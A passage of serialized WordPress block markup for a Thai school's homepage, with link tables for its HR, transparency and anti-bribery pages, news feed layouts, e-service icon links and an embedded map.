{\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://pakheang.my.canva.site/docmentorderv2\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1908,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbyfuu5DE6Sug1gTORaEw1XTMD3zj82GVkMIkPseb_e71HZWAqbrLMuADBmWcyARoaNa/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การลา-1.png\" alt=\"\" class=\"wp-image-1908\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html 